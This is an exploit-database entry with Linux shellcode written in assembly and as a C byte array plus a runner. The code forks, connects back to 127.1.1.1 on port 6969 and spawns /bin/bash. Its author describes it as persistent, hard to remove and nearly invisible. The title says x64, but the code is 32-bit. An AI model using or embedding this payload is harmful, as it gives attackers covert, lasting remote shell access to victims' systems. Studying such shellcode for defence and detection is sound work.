Linux/x64 - Reverse (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)

EDB-ID:

34667

CVE:

N/A




Platform:

Linux_x86-64

Date:

2014-09-15


/*
#Title: connect back shellcode that splits from the process it was injected into, and then stays persistent and difficult to remove. It is also very close to invisible due to some interesting effects created by forking, and calling the rdtsc instruction
#length: 139 bytes
#Date: 14 September  2014
#Author: Aaron Yool (aka: MadMouse)
#tested On: Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
*/

/*
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
irc.enigmagroup.org
;
; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
irc.enigmagroup.org
;
; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
[bits 32]
section .text
global _start
_start:
; fork(void);
    xor eax,eax ; cleanup after rdtsc
    xor edx,edx ; ....
    xor ebx,ebx ; cleanup the rest
    xor ecx,ecx ; ....
    mov al,0x02
    int 0x80
    cmp eax,1    ; if this is a child, or we have failed to clone
    jl fork        ; jump to the main code
    jmp exit
fork:
; socket(AF_INET, SOCK_STREAM, 0);
    push eax
    push byte 0x1 ; SOCK_STREAM
    push byte 0x2 ; AF_INET
    mov al, 0x66 ; sys_socketcall
    mov bl,0x1    ; sys_socket
    mov ecx,esp
    int 0x80

; dup2(s,i);
    mov ebx,eax ; s
    xor ecx,ecx
loop:
    mov al,0x3f    ; sys_dup2
    int 0x80
    inc ecx
    cmp ecx,4
    jne loop

; connect(s, (sockaddr *) &addr,0x10);
    push 0x0101017f        ; IP = 127.1.1.1
    push word 0x391b    ; PORT = 6969
    push word 0x2        ; AF_INET
    mov ecx,esp

    push byte 0x10
    push ecx        ;pointer to arguments
    push ebx        ; s -> standard out/in
    mov ecx,esp
    mov al,0x66
    int 0x80
    xor ecx,ecx
    sub eax,ecx
    jnz cleanup ; cleanup and start over

; fork(void);
    mov al,0x02
    int 0x80
    cmp eax,1    ; if this is a child, or we have failed to clone
    jl client    ; jump to the shell
    xor eax,eax
    push eax
    jmp cleanup ; cleanup and start over

client:
; execve(SHELLPATH,{SHELLPATH,0},0);
    mov al,0x0b
    jmp short sh
load_sh:
    pop esi
    push edx ; 0
    push esi
    mov ecx,esp
    mov ebx,esi
    int 0x80

cleanup:
; close(%ebx)
    xor eax,eax
    mov al,0x6
    int 0x80
    pause
    rdtsc
    pause
    jmp _start

exit:
; exit(0);
    xor eax,eax
    mov al,0x1
    xor ebx,ebx
    int 0x80

sh:
    call load_sh
    db "/bin/bash"

*/

const char evil[] =
"\x31\xc0\x31\xd2\x31\xdb\x31\xc9\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x02\xeb\x62\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x04\x75\xf6\x68\x7f\x01\x01\x01\x66\x68\x1b\x39\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x29\xc8\x75\x1b\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x05\x31\xc0\x50\xeb\x0d\xb0\x0b\xeb\x1f\x5e\x52\x56\x89\xe1\x89\xf3\xcd\x80\x31\xc0\xb0\x06\xcd\x80\xf3\x90\x0f\x31\xf3\x90\xeb\x8b\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";

typedef void (*shellcode)(void);
void main(void)
{
    ((shellcode)evil)();
}